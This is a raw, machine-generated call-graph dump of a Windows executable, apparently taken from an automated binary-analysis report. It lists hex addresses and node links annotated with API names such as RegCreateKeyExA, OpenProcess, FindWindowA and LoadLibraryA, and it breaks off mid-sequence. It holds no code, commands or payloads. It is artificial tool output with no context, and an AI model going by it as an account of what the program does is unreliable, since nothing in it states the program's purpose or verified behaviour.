111663be _fgetc _setlocale 53545->53546 53547 1117459f __lock 43 API calls 53545->53547 53546->53497 53548 1116640b 53547->53548 53642 11165814 53548->53642 53554 1116642f 53555 111664ec 53554->53555 53556 1116643b __expandlocale 53554->53556 53670 111710d5 8 API calls 53555->53670 53559 1117459f __lock 43 API calls 53556->53559 53558 111664f2 53671 1117116e 43 API calls 4 library calls 53558->53671 53561 11166461 53559->53561 53666 111712b9 51 API calls 3 library calls 53561->53666 53563 11166473 53667 111710d5 8 API calls 53563->53667 53565 11166479 53566 11166497 53565->53566 53668 111712b9 51 API calls 3 library calls 53565->53668 53669 111664e1 LeaveCriticalSection _doexit 53566->53669 53792 11143690 53569->53792 53571 11143795 53572 1103143c 53571->53572 53573 11143690 2 API calls 53571->53573 53574 11166654 64 API calls std::locale::facet::_Facet_Register 53571->53574 53572->53500 53573->53571 53574->53571 53576 11061710 225 API calls 53575->53576 53577 11061ade 53576->53577 53578 111101b0 std::locale::facet::_Facet_Register 200 API calls 53577->53578 53579 11061b0b 53578->53579 53580 11061b24 53579->53580 53581 11061710 225 API calls 53579->53581 53582 111101b0 std::locale::facet::_Facet_Register 200 API calls 53580->53582 53581->53580 53583 11061b35 53582->53583 53584 11061710 225 API calls 53583->53584 53586 11061b4e 53583->53586 53584->53586 53585 11031487 53585->53503 53585->53505 53586->53585 53806 11061a70 53586->53806 53589 11061a70 211 API calls 53590 11061b94 53589->53590 53591 11061a70 211 API calls 53590->53591 53591->53585 53593 111101b0 std::locale::facet::_Facet_Register 200 API calls 53592->53593 53594 11125d74 53593->53594 53595 11125d8a 53594->53595 53598 11125da5 53594->53598 53928 110765c0 415 API calls std::locale::facet::_Facet_Register 53595->53928 53597 11125d9a 53597->53598 53599 11125e08 53598->53599 53929 110717d0 204 API calls std::locale::facet::_Facet_Register 53598->53929 53599->53511 53602 1105d1c1 53601->53602 53603 1105d1ad 53601->53603 53931 11001780 PostThreadMessageA 53602->53931 53930 110016d0 378 API calls std::locale::facet::_Facet_Register 53603->53930 53606 1105d1c6 53606->53517 53607 1105d1bd 53607->53517 53609 11027830 GetMessageA 53608->53609 53932 110cd940 53609->53932 53627 111101b0 std::locale::facet::_Facet_Register 200 API calls 53626->53627 53628 11061761 53627->53628 53629 11061777 InitializeCriticalSection 53628->53629 53944 11061210 202 API calls 3 library calls 53628->53944 53632 110617b7 53629->53632 53633 11061826 53629->53633 53945 1105f830 216 API calls 2 library calls 53632->53945 53633->53503 53635 110617d8 RegCreateKeyExA 53636 11061832 RegCreateKeyExA 53635->53636 53637 110617ff RegCreateKeyExA 53635->53637 53636->53633 53638 11061865 RegCreateKeyExA 53636->53638 53637->53633 53637->53636 53638->53633 53639->53533 53640->53532 53641->53533 53643 1116581d 53642->53643 53644 11165836 53642->53644 53643->53644 53672 11171046 8 API calls 53643->53672 53646 111664d5 53644->53646 53673 111744c6 LeaveCriticalSection 53646->53673 53648 11166422 53649 11166187 53648->53649 53650 111661b0 53649->53650 53655 111661cb 53649->53655 53652 11165e4d __setlocale_set_cat 108 API calls 53650->53652 53657 111661ba 53650->53657 53651 111662f5 53651->53657 53728 11165ac7 50 API calls 4 library calls 53651->53728 53652->53657 53653 1116631c 53674 11165c2c 53653->53674 53655->53651 53655->53653 53662 11166200 _strpbrk _strncmp _strcspn 53655->53662 53657->53554 53658 11166331 __expandlocale 53658->53651 53658->53657 53689 11165e4d 53658->53689 53660 11166257 _strlen 53660->53662 53662->53651 53662->53657 53662->53660 53663 1116630e __invoke_watson 53662->53663 53664 11165e4d __setlocale_set_cat 108 API calls 53662->53664 53727 111699f9 43 API calls _fgetc 53662->53727 53663->53657 53664->53662 53665->53546 53666->53563 53667->53565 53668->53566 53669->53546 53670->53558 53671->53546 53672->53644 53673->53648 53675 1116c675 __getptd 43 API calls 53674->53675 53676 11165c67 53675->53676 53677 11165d07 _strlen 53676->53677 53678 11165cba _strcpy_s 53676->53678 53680 11165cd4 53676->53680 53687 11165cfb __expandlocale 53677->53687 53678->53680 53678->53687 53680->53658 53681 11165d02 __invoke_watson 53681->53677 53682 11165de0 _memmove 53682->53687 53684 11165e0f _strcpy_s 53684->53680 53684->53687 53685 11165df9 _memmove 53685->53684 53687->53680 53687->53681 53687->53682 53687->53684 53687->53685 53729 1116593d _memset 53687->53729 53736 11174bcc 53687->53736 53768 11165a5c 46 API calls __setlocale_get_all 53687->53768 53769 111699f9 43 API calls _fgetc 53687->53769 53690 1116c675 __getptd 43 API calls 53689->53690 53691 11165e7a 53690->53691 53692 11165c2c __expandlocale 92 API calls 53691->53692 53693 11165ea2 __expandlocale 53692->53693 53694 11165ea9 53693->53694 53695 11165ed8 _strlen __malloc_crt 53693->53695 53694->53658 53695->53694 53696 11165eff _memmove _strcpy_s 53695->53696 53697 11165f71 _memmove 53696->53697 53698 1116617a __invoke_watson 53696->53698 53701 11165fb0 53697->53701 53712 11166071 _memcmp 53697->53712 53699 11166187 53698->53699 53700 111661b0 53699->53700 53708 111661cb 53699->53708 53702 11165e4d __setlocale_set_cat 98 API calls 53700->53702 53710 111661ba 53700->53710 53707 1116604b ___crtGetStringTypeA 53701->53707 53701->53712 53702->53710 53703 1116631c 53709 11165c2c __expandlocale 92 API calls 53703->53709 53705 111660f0 53711 11163aa5 _free 43 API calls 53705->53711 53706 11166121 53713 1116612d InterlockedDecrement 53706->53713 53719 11166155 53706->53719 53707->53712 53708->53703 53723 111662f5 53708->53723 53726 11166200 _strpbrk _strncmp _strcspn 53708->53726 53714 11166331 __expandlocale 53709->53714 53710->53658 53711->53694 53712->53705 53712->53706 53715 11166145 53713->53715 53713->53719 53714->53710 53720 11165e4d __setlocale_set_cat 98 API calls 53714->53720 53714->53723 53716 11163aa5 _free 43 API calls 53715->53716 53717 1116614d 53716->53717 53718 11163aa5 _free 43 API calls 53717->53718 53718->53719 53719->53698 53720->53714 53721 11166257 _strlen 53721->53726 53723->53710 53791 11165ac7 50 API calls 4 library calls 53723->53791 53724 1116630e __invoke_watson 53724->53710 53725 11165e4d __setlocale_set_cat 98 API calls 53725->53726 53726->53710 53726->53721 53726->53723 53726->53724 53726->53725 53790 111699f9 43 API calls _fgetc 53726->53790 53727->53662 53728->53657 53730 11165962 53729->53730 53731 11165969 53729->53731 53730->53687 53734 11165985 _strcspn 53731->53734 53770 111699f9 43 API calls _fgetc 53731->53770 53733 11165999 __invoke_watson 53733->53734 53734->53730 53734->53733 53771 111699f9 43 API calls _fgetc 53734->53771 53737 1116c675 __getptd 43 API calls 53736->53737 53741 11174bd9 53737->53741 53738 11174be6 GetUserDefaultLCID 53749 11174c6d 53738->53749 53740 11174c10 53742 11174c78 53740->53742 53744 11174c22 53740->53744 53741->53738 53741->53740 53782 1117463f 64 API calls _CountryEnumProc@4 53741->53782 53742->53738 53745 11174c83 _strlen EnumSystemLocalesA 53742->53745 53747 11174c36 _GetLcidFromLanguage 53744->53747 53748 11174c2d 53744->53748 53745->53749 53750 11174c34 53747->53750 53783 11174b29 _strlen _strlen 53748->53783 53761 11174dae 53749->53761 53772 111746a1 53749->53772 53750->53749 53787 1117463f 64 API calls _CountryEnumProc@4 53750->53787 53751 11174cde 53755 11174d03 IsValidCodePage 53751->53755 53751->53761 53754 11174c54 53754->53749 53757 11174c6f _GetLcidFromLanguage 53754->53757 53759 11174c66 53754->53759 53756 11174d15 IsValidLocale 53755->53756 53755->53761 53758 11174d28 53756->53758 53756->53761 53757->53749 53758->53761 53762 11174d79 GetLocaleInfoA 53758->53762 53763 11174d59 _strcpy_s 53758->53763 53760 11174b29 _GetLcidFromLangCountry 3 API calls 53759->53760 53760->53749 53761->53687 53762->53761 53765 11174d8a GetLocaleInfoA 53762->53765 53764 11174d6d __invoke_watson 53763->53764 53763->53765 53764->53762 53765->53761 53766 11174d9e 53765->53766 53788 1116c308 43 API calls _xtoa_s@20 53766->53788 53768->53687 53769->53687 53770->53734 53771->53734 53773 111746fb GetLocaleInfoW 53772->53773 53777 111746ab __expandlocale 53772->53777 53774 11174717 53773->53774 53775 111746ea 53773->53775 53774->53775 53776 1117471d GetACP 53774->53776 53775->53751 53776->53751 53777->53773 53778 111746c1 __expandlocale 53777->53778 53779 111746d2 GetLocaleInfoW 53778->53779 53780 111746ef 53778->53780 53779->53775 53789 11163c91 55 API calls __wcstoi64 53780->53789 53782->53740 53784 11174b5a _GetPrimaryLen 53783->53784 53785 11174b66 EnumSystemLocalesA 53784->53785 53786 11174b80 53785->53786 53786->53750 53787->53754 53788->53761 53789->53775 53790->53726 53791->53710 53793 111436a6 53792->53793 53795 11143763 53793->53795 53801 11081d30 53793->53801 53795->53571 53796 111436cb 53797 11081d30 IsDBCSLeadByte 53796->53797 53798 111436fb 53797->53798 53799 1114374d 53798->53799 53800 11143738 _memmove 53798->53800 53799->53571 53800->53799 53802 11081d3c 53801->53802 53804 11081d41 __mbschr_l std::locale::facet::_Facet_Register 53801->53804 53805 11081c50 IsDBCSLeadByte 53802->53805 53804->53796 53805->53804 53809 11061970 53806->53809 53808 11061a96 53808->53589 53816 11061290 53809->53816 53811 110619ba 53824 11061320 53811->53824 53813 110619cc 53814 11061a08 53813->53814 53815 11061320 211 API calls 53813->53815 53814->53808 53815->53813 53817 111101b0 std::locale::facet::_Facet_Register 200 API calls 53816->53817 53818 110612ac 53817->53818 53819 110612b3 53818->53819 53854 1116305a std::exception::_Copy_str 53818->53854 53819->53811 53821 11061304 53855 111634b1 RaiseException 53821->53855 53823 11061319 53825 11061355 53824->53825 53852 11061624 std::ios_base::_Ios_base_dtor 53824->53852 53826 110614b4 53825->53826 53827 11061401 RegEnumValueA 53825->53827 53828 11061389 RegQueryInfoKeyA 53825->53828 53850 11061542 std::ios_base::_Ios_base_dtor 53826->53850 53826->53852 53856 110611e0 53826->53856 53830 1106149c 53827->53830 53841 11061435 53827->53841 53831 110613c2 53828->53831 53832 110613ae 53828->53832 53835 11163aa5 _free 43 API calls 53830->53835 53836 110613e2 53831->53836 53864 11029a70 198 API calls 2 library calls 53831->53864 53863 11029a70 198 API calls 2 library calls 53832->53863 53833 11081d30 IsDBCSLeadByte 53833->53841 53837 110614a9 53835->53837 53839 11163a11 _malloc 45 API calls 53836->53839 53837->53826 53844 110613f0 53839->53844 53840 1106146e RegEnumValueA 53840->53830 53840->53841 53841->53833 53841->53840 53841->53852 53865 11081e70 53841->53865 53843 110615a0 53843->53850 53876 11029a70 198 API calls 2 library calls 53843->53876 53844->53827 53848 1106151f 53875 1105fdc0 64 API calls _CountryEnumProc@4 53848->53875 53849 11081d30 IsDBCSLeadByte 53849->53850 53850->53843 53850->53849 53850->53852 53853 11081e70 66 API calls 53850->53853 53852->53813 53853->53850 53854->53821 53855->53823 53857 110611ee 53856->53857 53858 11061208 53856->53858 53877 110610f0 53857->53877 53858->53850 53860 11145bc0 53858->53860 53911 111434c0 53860->53911 53866 11081e7d 53865->53866 53867 11081e82 53865->53867 53926 11081c50 IsDBCSLeadByte 53866->53926 53869 11081e8b 53867->53869 53874 11081e9f 53867->53874 53927 1116558e 64 API calls 2 library calls 53869->53927 53871 11081e98 53871->53841 53872 11081f03 53872->53841 53873 11166654 64 API calls std::locale::facet::_Facet_Register 53873->53874 53874->53872 53874->53873 53875->53850 53880 110609a0 53877->53880 53879 1106110b 53879->53858 53879->53879 53881 11060a24 53880->53881 53882 110609df 53880->53882 53881->53879 53888 11060820 53882->53888 53885 110609a0 204 API calls 53886 11060a16 53885->53886 53887 110609a0 204 API calls 53886->53887 53887->53881 53889 111101b0 std::locale::facet::_Facet_Register 200 API calls 53888->53889 53890 11060854 53889->53890 53891 11060862 53890->53891 53892 110608b9 53890->53892 53899 11060100 53891->53899 53903 1116305a std::exception::_Copy_str 53892->53903 53896 110608c8 53904 111634b1 RaiseException 53896->53904 53898 110608dd 53900 11060134 53899->53900 53901 11060141 53899->53901 53905 1105f7c0 53900->53905 53901->53885 53903->53896 53904->53898 53906 1105f7d2 53905->53906 53907 11110230 199 API calls 53906->53907 53908 1105f7e2 53907->53908 53912 111434d0 53911->53912 53912->53912 53917 11110230 53912->53917 53914 111434f8 53924 111433d0 MultiByteToWideChar WideCharToMultiByte GetLastError _strncpy __crtCompareStringA_stat 53914->53924 53916 11143506 53916->53848 53918 11163a11 _malloc 45 API calls 53917->53918 53919 1111023e 53918->53919 53920 11110247 53919->53920 53921 1111025e _memset 53919->53921 53925 11029a70 198 API calls 2 library calls 53920->53925 53921->53914 53924->53916 53926->53867 53927->53871 53928->53597 53929->53599 53930->53607 53931->53606 53933 111103d0 ___DllMainCRTStartup 4 API calls 53932->53933 53934 110cd955 EnterCriticalSection 53933->53934 53944->53629 53945->53635 53946 11116880 53960 11145ef0 53946->53960 53949 111168c5 53950 111168a8 53949->53950 53951 111168d4 CoInitialize CoCreateInstance 53949->53951 53953 11116904 LoadLibraryA 53951->53953 53959 111168f9 53951->53959 53952 11145c70 std::locale::facet::_Facet_Register 72 API calls 53952->53949 53954 11116920 GetProcAddress 53953->53954 53953->53959 53957 11116930 SHGetSettings 53954->53957 53958 11116944 FreeLibrary 53954->53958 53955 111169e1 CoUninitialize 53956 111169e7 53955->53956 53957->53958 53958->53959 53959->53955 53959->53956 53961 11145c70 std::locale::facet::_Facet_Register 72 API calls 53960->53961 53962 1111689e 53961->53962 53962->53949 53962->53950 53962->53952 53963 1102ebd0 53964 1102ec13 53963->53964 53965 111101b0 std::locale::facet::_Facet_Register 200 API calls 53964->53965 53966 1102ec1a 53965->53966 53967 11143780 66 API calls 53966->53967 53968 1102ec64 53967->53968 53969 1102ec91 53968->53969 53970 11081e70 66 API calls 53968->53970 53972 11143780 66 API calls 53969->53972 53971 1102ec76 53970->53971 53973 11081e70 66 API calls 53971->53973 53974 1102ecba 53972->53974 53973->53969 53975 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53974->53975 53979 1102ecc7 53974->53979 53975->53979 53976 1102ecf6 53977 1102ed68 53976->53977 53978 1102ed4f GetSystemMetrics 53976->53978 53981 1102ed82 CreateEventA 53977->53981 53978->53977 53980 1102ed5e 53978->53980 53979->53976 53982 11145c70 std::locale::facet::_Facet_Register 72 API calls 53979->53982 53983 11147060 std::locale::facet::_Facet_Register 16 API calls 53980->53983 53984 1102ed95 53981->53984 53985 1102eda9 53981->53985 53982->53976 53983->53977 54809 11029a70 198 API calls 2 library calls 53984->54809 53987 111101b0 std::locale::facet::_Facet_Register 200 API calls 53985->53987 53988 1102edb0 53987->53988 53989 1102edd0 53988->53989 54810 11110de0 53988->54810 53991 111101b0 std::locale::facet::_Facet_Register 200 API calls 53989->53991 53992 1102ede4 53991->53992 53993 11110de0 377 API calls 53992->53993 53994 1102ee04 53992->53994 53993->53994 53995 111101b0 std::locale::facet::_Facet_Register 200 API calls 53994->53995 53996 1102ee83 53995->53996 53997 1102eeb3 53996->53997 53998 11061aa0 234 API calls 53996->53998 53999 111101b0 std::locale::facet::_Facet_Register 200 API calls 53997->53999 53998->53997 54000 1102eecd 53999->54000 54001 1102eef2 FindWindowA 54000->54001 54002 11061710 225 API calls 54000->54002 54004 1102f032 54001->54004 54005 1102ef2b 54001->54005 54002->54001 54271 11061ef0 54004->54271 54005->54004 54009 1102ef43 GetWindowThreadProcessId 54005->54009 54007 1102f044 54008 11061ef0 203 API calls 54007->54008 54010 1102f050 54008->54010 54011 11147060 std::locale::facet::_Facet_Register 16 API calls 54009->54011 54012 11061ef0 203 API calls 54010->54012 54013 1102ef60 OpenProcess 54011->54013 54015 1102f05c 54012->54015 54013->54004 54014 1102ef7d 54013->54014 54019 11147060 std::locale::facet::_Facet_Register 16 API calls 54014->54019 54016 1102f073 54015->54016 54017 1102f06a 54015->54017 54276 111464e0 54016->54276 54838 11028360 99 API calls std::locale::facet::_Facet_Register 54017->54838 54022 1102efb0 54019->54022 54020 1102f06f 54020->54016 54024 1102efef CloseHandle FindWindowA 54022->54024 54027 11147060 std::locale::facet::_Facet_Register 16 API calls 54022->54027 54023 1102f082 54025 1102f086 54023->54025 54285 1102a6d0 IsJPIK 54023->54285 54028 1102f022 54024->54028 54029 1102f014 GetWindowThreadProcessId 54024->54029 54295 11145990 ExpandEnvironmentStringsA 54025->54295 54031 1102efc2 SendMessageA WaitForSingleObject 54027->54031 54032 11147060 std::locale::facet::_Facet_Register 16 API calls 54028->54032 54029->54028 54031->54024 54034 1102efe2 54031->54034 54035 1102f02f 54032->54035 54033 1102f0a3 54304 11143e00 54033->54304 54037 11147060 std::locale::facet::_Facet_Register 16 API calls 54034->54037 54035->54004 54039 1102efec 54037->54039 54038 1102f0b5 54040 1102f177 54038->54040 54312 11063880 54038->54312 54039->54024 54316 11027b20 54040->54316 54042 1102f0d6 54042->54040 54044 110b7df0 std::locale::facet::_Facet_Register 9 API calls 54042->54044 54047 1102f1bd 54333 110287a0 54047->54333 54048 1102f19c std::locale::facet::_Facet_Register 54048->54047 54050 1102ad70 std::locale::facet::_Facet_Register 113 API calls 54048->54050 54052 1102f1b0 54050->54052 54054 1102ad70 std::locale::facet::_Facet_Register 113 API calls 54052->54054 54056 1102f1b7 54054->54056 54332 11143a30 _strncpy 54056->54332 54272 11061f66 54271->54272 54275 11061f17 54271->54275 54272->54007 54273 11081e70 66 API calls 54273->54275 54275->54272 54275->54273 54886 11061e10 203 API calls 2 library calls 54275->54886 54277 111457a0 std::locale::facet::_Facet_Register 198 API calls 54276->54277 54278 111464fb wsprintfA 54277->54278 54279 111457a0 std::locale::facet::_Facet_Register 198 API calls 54278->54279 54280 11146517 wsprintfA 54279->54280 54281 11143e00 std::locale::facet::_Facet_Register 3 API calls 54280->54281 54282 11146534 54281->54282 54283 11143e00 std::locale::facet::_Facet_Register 3 API calls 54282->54283 54284 11146549 54282->54284 54283->54284 54284->54023 54286 1102a705 54285->54286 54294 1102a765 54285->54294 54287 111101b0 std::locale::facet::_Facet_Register 200 API calls 54286->54287 54288 1102a70c 54287->54288 54289 1102a73b 54288->54289 54291 11061aa0 234 API calls 54288->54291 54290 11063880 287 API calls 54289->54290 54292 1102a759 54290->54292 54291->54289 54292->54294 54887 110d1930 54292->54887 54294->54025 54296 111459c7 54295->54296 54297 111459d4 54296->54297 54298 111459e4 std::locale::facet::_Facet_Register 54296->54298 54299 111459fe 54296->54299 54297->54033 54301 111459f5 GetModuleFileNameA 54298->54301 54300 111457a0 std::locale::facet::_Facet_Register 198 API calls 54299->54300 54302 11145a04 54300->54302 54301->54302 54303 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 54302->54303 54303->54297 54305 11143e21 CreateFileA 54304->54305 54307 11143ebe FindCloseChangeNotification 54305->54307 54308 11143e9e 54305->54308 54311 11143ed7 54307->54311 54309 11143ea2 CreateFileA 54308->54309 54310 11143edb 54308->54310 54309->54307 54309->54310 54310->54038 54311->54038 54313 110638a8 54312->54313 54948 110627b0 54313->54948 54315 110638c2 std::locale::facet::_Facet_Register 54315->54042 54317 11061a70 211 API calls 54316->54317 54318 11027b54 54317->54318 54319 11027c38 54318->54319 54320 11027bbf LoadIconA 54318->54320 54321 11145ef0 std::locale::facet::_Facet_Register 72 API calls 54318->54321 54325 11027cec 54319->54325 54330 11081e70 66 API calls 54319->54330 54331 11145c70 std::locale::facet::_Facet_Register 72 API calls 54319->54331 55470 11061e10 203 API calls 2 library calls 54319->55470 54322 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 54320->54322 54327 11027bd1 54320->54327 54326 11027ba2 LoadLibraryExA 54321->54326 54323 11027c13 54322->54323 54324 11027bff LoadIconA 54322->54324 54323->54319 54329 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 54323->54329 54324->54323 54325->54048 54326->54320 54326->54324 54327->54322 54329->54319 54330->54319 54331->54319 54332->54047 54334 11147060 std::locale::facet::_Facet_Register 16 API calls 54333->54334 54335 110287c6 54334->54335 54336 110288b4 54335->54336 54337 110287dd GetModuleFileNameA 54335->54337 55471 11013dd0 17 API calls std::locale::facet::_Facet_Register 54336->55471 54339 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 54337->54339 54341 11028801 54339->54341 54340 110288c7 54811 111101b0 std::locale::facet::_Facet_Register 200 API calls 54810->54811 54812 11110e11 54811->54812 54813 11110e33 GetCurrentThreadId InitializeCriticalSection 54812->54813 54814 111101b0 std::locale::facet::_Facet_Register 200 API calls 54812->54814 54817 11110ea0 EnterCriticalSection 54813->54817 54818 11110e93 InitializeCriticalSection 54813->54818 54816 11110e2c 54814->54816 54816->54813 56334 1116305a std::exception::_Copy_str 54816->56334 54819 11110f5a LeaveCriticalSection 54817->54819 54820 11110ece CreateEventA 54817->54820 54818->54817 54819->53989 54822 11110ee1 54820->54822 54823 11110ef8 54820->54823 56336 11029a70 198 API calls 2 library calls 54822->56336 54824 111101b0 std::locale::facet::_Facet_Register 200 API calls 54823->54824 54827 11110eff 54824->54827 54825 11110e4f 56335 111634b1 RaiseException 54825->56335 54830 11110de0 371 API calls 54827->54830 54831 11110f1c 54827->54831 54830->54831 54832 111101b0 std::locale::facet::_Facet_Register 200 API calls 54831->54832 54833 11110f2c 54832->54833 54834 11110f3d 54833->54834 56337 11110280 InterlockedIncrement InterlockedIncrement CreateEventA 54833->56337 54836 11110040 371 API calls 54834->54836 54837 11110f55 54836->54837 54837->54819 54838->54020 54886->54275 54897 110d16d0 54887->54897 54890 110d197b 54893 110d1995 54890->54893 54894 110d1978 54890->54894 54891 110d1964 54911 11029a70 198 API calls 2 library calls 54891->54911 54893->54294 54894->54890 54898 110d16dc 54897->54898 54899 110d16f7 54898->54899 54900 110d16e0 54898->54900 54913 110d03e0 54899->54913 54940 11029a70 198 API calls 2 library calls 54900->54940 54907 110d172e 54907->54890 54907->54891 54908 110d1717 54941 11029a70 198 API calls 2 library calls 54908->54941 54914 110d03e9 54913->54914 54915 110d03ed 54914->54915 54917 110d0404 54914->54917 54942 11029a70 198 API calls 2 library calls 54915->54942 54918 110d0438 54917->54918 54919 110d0401 54917->54919 54921 110d0435 54918->54921 54922 110d0456 54918->54922 54919->54917 54943 11029a70 198 API calls 2 library calls 54919->54943 54921->54918 54944 11029a70 198 API calls 2 library calls 54921->54944 54925 110d12e0 54922->54925 54926 110d12ee 54925->54926 54927 110d1309 54926->54927 54928 110d12f2 54926->54928 54930 110d1306 54927->54930 54934 110d133c 54927->54934 54945 11029a70 198 API calls 2 library calls 54928->54945 54930->54927 54946 11029a70 198 API calls 2 library calls 54930->54946 54931 110d13b0 54931->54907 54931->54908 54933 110d136f _memmove 54936 110d1395 54933->54936 54934->54931 54934->54933 54936->54931 54937 110d1399 54936->54937 54947 11029a70 198 API calls 2 library calls 54937->54947 55042 11145a70 54948->55042 54950 1106283c 54951 110d1930 199 API calls 54950->54951 54952 11062850 54951->54952 54953 11062a37 54952->54953 54989 11062864 std::ios_base::_Ios_base_dtor 54952->54989 55051 1116535d 54952->55051 54956 1116535d _fgets 60 API calls 54953->54956 54955 11164c77 std::locale::facet::_Facet_Register 51 API calls 54986 11062923 std::ios_base::_Ios_base_dtor 54955->54986 54958 11062a51 54956->54958 54957 110628e7 54960 11062ab7 _strpbrk 54958->54960 54961 11062a58 54958->54961 55066 11164536 54960->55066 54964 11164c77 std::locale::facet::_Facet_Register 51 API calls 54961->54964 54961->54986 54964->54986 54986->54315 54989->54955 54989->54986 55045 11145a83 std::ios_base::_Ios_base_dtor 55042->55045 55043 11145990 200 API calls 55043->55045 55044 11164ead std::locale::facet::_Facet_Register 111 API calls 55044->55045 55045->55043 55045->55044 55046 11145aea std::ios_base::_Ios_base_dtor 55045->55046 55047 11145aa5 GetLastError 55045->55047 55046->54950 55047->55045 55048 11145ab0 Sleep 55047->55048 55049 11164ead std::locale::facet::_Facet_Register 111 API calls 55048->55049 55050 11145ac2 55049->55050 55050->55045 55050->55046 55053 11165369 _fgetc 55051->55053 55052 1116537c 55144 1116a1af 43 API calls __getptd_noexit 55052->55144 55053->55052 55055 111653ad 55053->55055 55056 1116be59 __lock_file 44 API calls 55055->55056 55058 11165381 _fgetc 55055->55058 55057 111653bb 55056->55057 55058->54957 55144->55058 55470->54319 55471->54340 56334->54825 56335->54813 56337->54834 56339 1113d980 56340 1113d989 56339->56340 56341 1113d98e 56339->56341 56343 11139ed0 56340->56343 56344 11139f12 56343->56344 56345 11139f07 GetCurrentThreadId 56343->56345 56346 11139f20 56344->56346 56453 11029950 56344->56453 56345->56344 56460 11134830 56346->56460 56349 11139f25 56496 11134310 56349->56496 56351 11139f2c 56352 1113a011 56351->56352 56353 1113a59a 56351->56353 56584 11139a70 56351->56584 56356 1113a042 FindWindowA 56352->56356 56366 1113a0da 56352->56366 56353->56341 56355 11139f5c IsWindow IsWindowVisible 56357 11147060 std::locale::facet::_Facet_Register 16 API calls 56355->56357 56358 1113a057 IsWindowVisible 56356->56358 56356->56366 56359 11139f87 56357->56359 56360 1113a05e 56358->56360 56358->56366 56363 11139fa3 IsWindowVisible 56359->56363 56365 11139a70 326 API calls 56360->56365 56360->56366 56361 1113a2b0 56364 1113a2ca 56361->56364 56368 11139a70 326 API calls 56361->56368 56362 1113a0ff 56362->56361 56373 1113a2a4 56362->56373 56363->56352 56367 11139fb1 56363->56367 56370 1113a2e7 56364->56370 56655 1106c340 262 API calls 56364->56655 56369 1113a07f IsWindowVisible 56365->56369 56366->56362 56381 1113a174 56366->56381 56386 11081d30 IsDBCSLeadByte 56366->56386 56367->56352 56374 11139fb9 56367->56374 56368->56364 56369->56366 56375 1113a08e IsIconic 56369->56375 56656 1112ddd0 GetTickCount IsWindow _memset IsWindow PostMessageA 56370->56656 56654 1102d750 225 API calls std::locale::facet::_Facet_Register 56373->56654 56379 11147060 std::locale::facet::_Facet_Register 16 API calls 56374->56379 56375->56366 56376 1113a09f GetForegroundWindow 56375->56376 56652 11132120 115 API calls 56376->56652 56377 1113a2ec 56382 1113a2f4 56377->56382 56388 1113a314 56377->56388 56389 1113a308 56377->56389 56384 11139fc3 GetForegroundWindow 56379->56384 56387 11143e00 std::locale::facet::_Facet_Register 3 API calls 56381->56387 56382->56377 56383 1113a2ab 56383->56361 56390 11139fd2 EnableWindow 56384->56390 56391 11139ffe 56384->56391 56385 1113a0ae 56653 11132120 115 API calls 56385->56653 56386->56381 56393 1113a186 56387->56393 56658 111326b0 263 API calls std::locale::facet::_Facet_Register 56388->56658 56394 1113a319 56389->56394 56657 11132780 263 API calls std::locale::facet::_Facet_Register 56389->56657 56650 11132120 115 API calls 56390->56650 56391->56352 56398 1113a00a SetForegroundWindow 56391->56398 56399 1113a193 GetLastError 56393->56399 56411 1113a1a1 56393->56411 56401 1113a312 56394->56401 56402 1113a429 56394->56402 56397 1113a0b5 56407 1113a0cb EnableWindow 56397->56407 56410 1113a0c4 SetForegroundWindow 56397->56410 56398->56352 56408 11147060 std::locale::facet::_Facet_Register 16 API calls 56399->56408 56401->56394 56404 1113a331 56401->56404 56427 1113a3db 56401->56427 56406 11139600 264 API calls 56402->56406 56403 11139fe9 56651 11132120 115 API calls 56403->56651 56404->56402 56413 111101b0 std::locale::facet::_Facet_Register 200 API calls 56404->56413 56420 1113a42e 56406->56420 56407->56366 56408->56411 56409 11139ff0 EnableWindow 56409->56391 56410->56407 56411->56362 56412 1113a1f2 56411->56412 56415 11081d30 IsDBCSLeadByte 56411->56415 56417 11143e00 std::locale::facet::_Facet_Register 3 API calls 56412->56417 56416 1113a352 56413->56416 56414 1113a57a std::ios_base::_Ios_base_dtor 56414->56353 56415->56412 56418 1113a373 56416->56418 56659 11057eb0 241 API calls 56416->56659 56419 1113a204 56417->56419 56660 1110fff0 InterlockedIncrement 56418->56660 56419->56362 56422 1113a20b GetLastError 56419->56422 56428 1113a455 56420->56428 56580 11142d90 56420->56580 56424 11147060 std::locale::facet::_Facet_Register 16 API calls 56422->56424 56424->56362 56426 1113a398 56661 1104d790 301 API calls 56426->56661 56427->56402 56664 11110000 InterlockedDecrement 56427->56664 56428->56414 56431 1113a4cd 56428->56431 56432 1113a4aa 56428->56432 56433 1113a4d9 GetTickCount 56428->56433 56431->56414 56431->56433 56434 11147060 std::locale::facet::_Facet_Register 16 API calls 56432->56434 56433->56414 56435 1113a4eb 56433->56435 56437 1113a4b5 GetTickCount 56434->56437 56438 11143a50 113 API calls 56435->56438 56436 1113a3a3 56662 1104d7d0 301 API calls 56436->56662 56437->56414 56439 1113a4f7 56438->56439 56441 11147af0 202 API calls 56439->56441 56443 1113a502 56441->56443 56442 1113a3c4 56442->56402 56663 110ec320 224 API calls 56442->56663 56444 11143a50 113 API calls 56443->56444 56446 1113a515 56444->56446 56665 110261a0 LoadLibraryA 56446->56665 56448 1113a3d9 56448->56402 56449 1113a522 56449->56449 56666 1112d6e0 GetProcAddress SetLastError 56449->56666 56451 1113a569 56451->56414 56452 1113a573 FreeLibrary 56451->56452 56452->56414 56667 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56453->56667 56455 1102995e 56456 11029973 56455->56456 56668 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56455->56668 56669 11089fe0 202 API calls 2 library calls 56456->56669 56459 1102997e 56459->56346 56461 11134872 56460->56461 56462 11134b94 56460->56462 56461->56462 56463 1113489a GetLocalTime 56461->56463 56462->56349 56464 111348d1 LoadLibraryA 56463->56464 56465 111348b0 56463->56465 56670 11009940 LoadLibraryA 56464->56670 56466 11147060 std::locale::facet::_Facet_Register 16 API calls 56465->56466 56468 111348c5 56466->56468 56468->56464 56469 11134925 56671 110161e0 LoadLibraryA 56469->56671 56471 11134930 GetCurrentProcess 56472 11134955 GetProcAddress 56471->56472 56473 1113496d GetProcessHandleCount 56471->56473 56472->56473 56474 11134976 SetLastError 56472->56474 56475 1113497e 56473->56475 56474->56475 56476 111349a2 56475->56476 56477 11134988 